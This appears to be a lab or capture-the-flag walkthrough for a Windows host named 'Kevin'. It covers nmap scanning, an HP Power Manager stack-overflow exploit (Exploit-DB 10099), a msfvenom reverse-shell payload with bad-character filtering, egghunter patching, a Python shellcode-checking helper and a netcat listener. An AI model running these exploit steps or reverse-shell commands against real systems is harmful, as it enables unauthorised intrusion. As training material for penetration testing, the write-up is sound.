Kevin
nmap scan (all TCP ports, open ports only, skipping host discovery because the target drops ICMP)
nmap -p- --min-rate=1000 -T4 192.168.181.45 -Pn --open -v
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
3573/tcp open tag-ups-1
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49158/tcp open unknown
49160/tcp open unknown
Port 80 is HP Power Manager. Its login form has a known stack overflow (CVE-2009-2685) with a public exploit, Exploit-DB 10099, which searchsploit copies into the working directory:
searchsploit -m 10099
The shellcode hard-coded in 10099.py connects back to the exploit author's address, so regenerate it with msfvenom, keeping the same bad-character list and alphanumeric encoder as the original shellcode and asking for Python output so the blob can be pasted straight into the script:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.53 LPORT=80 EXITFUNC=thread -b "\x00\x1a\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c" -e x86/alpha_mixed --platform windows -f python
Patch the payload
The first eight bytes of SHELL ("n00bn00b") are the egg that the exploit's egghunter searches memory for, so they stay in front of the new shellcode; the only other change is the variable name in the line that formats the request.
Original payload:
SHELL = (
"n00bn00b"
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
......)
evil = evil % (HOST,HOST,SHELL,HOST)
After modification (the buf += lines are pasted unchanged from the msfvenom -f python output; the script runs under Python 2, where b"..." is an ordinary str, so the format line still works):
buf = b"n00bn00b"
buf += b"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
......
evil = evil % (HOST,HOST,buf,HOST)
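Before pasting the new blob into 10099.py it is worth checking it mechanically: that every buf += line reassembles to the bytes you expect, that none of the bytes from the -b list survived encoding (one surviving bad character silently truncates or corrupts the request), and that the egg tag is still in front. The script below is an added example, not part of the writeup or of the Exploit-DB code; SAMPLE_BLOB is a constructed stand-in for msfvenom output (not real shellcode) with two bad bytes planted in it so the check has something to report.

```python
"""Sanity-check a msfvenom '-f python' blob before splicing it into 10099.py.

Added example, not from the original writeup or the EDB exploit:
- parse_msfvenom_python() turns the `buf += b"..."` text msfvenom prints
  back into raw bytes;
- find_badchars() reports every byte from the -b list that survived encoding;
- build_egg_payload() prefixes the 8-byte egg ("n00b" twice) that the
  exploit's SHELL variable carries, so the egghunter can still find it.
"""
import ast

# The bad-character list passed to msfvenom -b in the writeup.
BADCHARS = bytes([0x00, 0x1a, 0x3a, 0x26, 0x3f, 0x25, 0x23, 0x20,
                  0x0a, 0x0d, 0x2f, 0x2b, 0x0b, 0x5c])

EGG_TAG = b"n00b"  # the hunter looks for the tag twice in a row

# Constructed stand-in for msfvenom -f python output (not real shellcode).
# The second line deliberately contains 0x3a and 0x00 from the bad list.
SAMPLE_BLOB = r'''buf =  b""
buf += b"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e"
buf += b"\x81\x76\x0e\x3a\x00\x11\x22"
'''


def parse_msfvenom_python(text):
    """Reassemble the bytes from msfvenom -f python output.

    Each relevant line is `buf = b"..."` or `buf += b"..."`; the right-hand
    side is a Python bytes literal, which ast.literal_eval decodes safely
    (no eval of arbitrary code).
    """
    out = b""
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("buf"):
            continue
        _, rhs = line.split("=", 1)  # covers both 'buf =' and 'buf +='
        value = ast.literal_eval(rhs.strip())
        if not isinstance(value, bytes):
            raise ValueError("expected a bytes literal: %r" % line)
        out += value
    return out


def find_badchars(shellcode, badchars=BADCHARS):
    """Return (offset, byte) for every bad character present in shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]


def build_egg_payload(shellcode, tag=EGG_TAG):
    """Prefix the egg (tag repeated twice) exactly as SHELL does in 10099.py."""
    if len(tag) != 4:
        raise ValueError("egg tag must be 4 bytes")
    return tag * 2 + shellcode


if __name__ == "__main__":
    sc = parse_msfvenom_python(SAMPLE_BLOB)
    print("parsed %d bytes of shellcode" % len(sc))
    bad = find_badchars(sc)
    if bad:
        for offset, byte in bad:
            print("bad character 0x%02x at offset %d" % (byte, offset))
        print("re-run msfvenom; do not paste this blob")
    else:
        payload = build_egg_payload(sc)
        print("clean; egg payload is %d bytes" % len(payload))
```

Run it against the real msfvenom output by replacing SAMPLE_BLOB with the text msfvenom printed; an empty list from find_badchars is the go-ahead to paste, and build_egg_payload gives the exact bytes the exploit will place in the request.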
Start the listener first, then run the exploit against the target. The listener port must match the LPORT baked into the payload (80 here). The shell takes about a minute to arrive because the egghunter has to walk the process's memory before it finds the "n00bn00b" tag and jumps to the shellcode.
nc -lnvp 80
python2 10099.py 192.168.181.45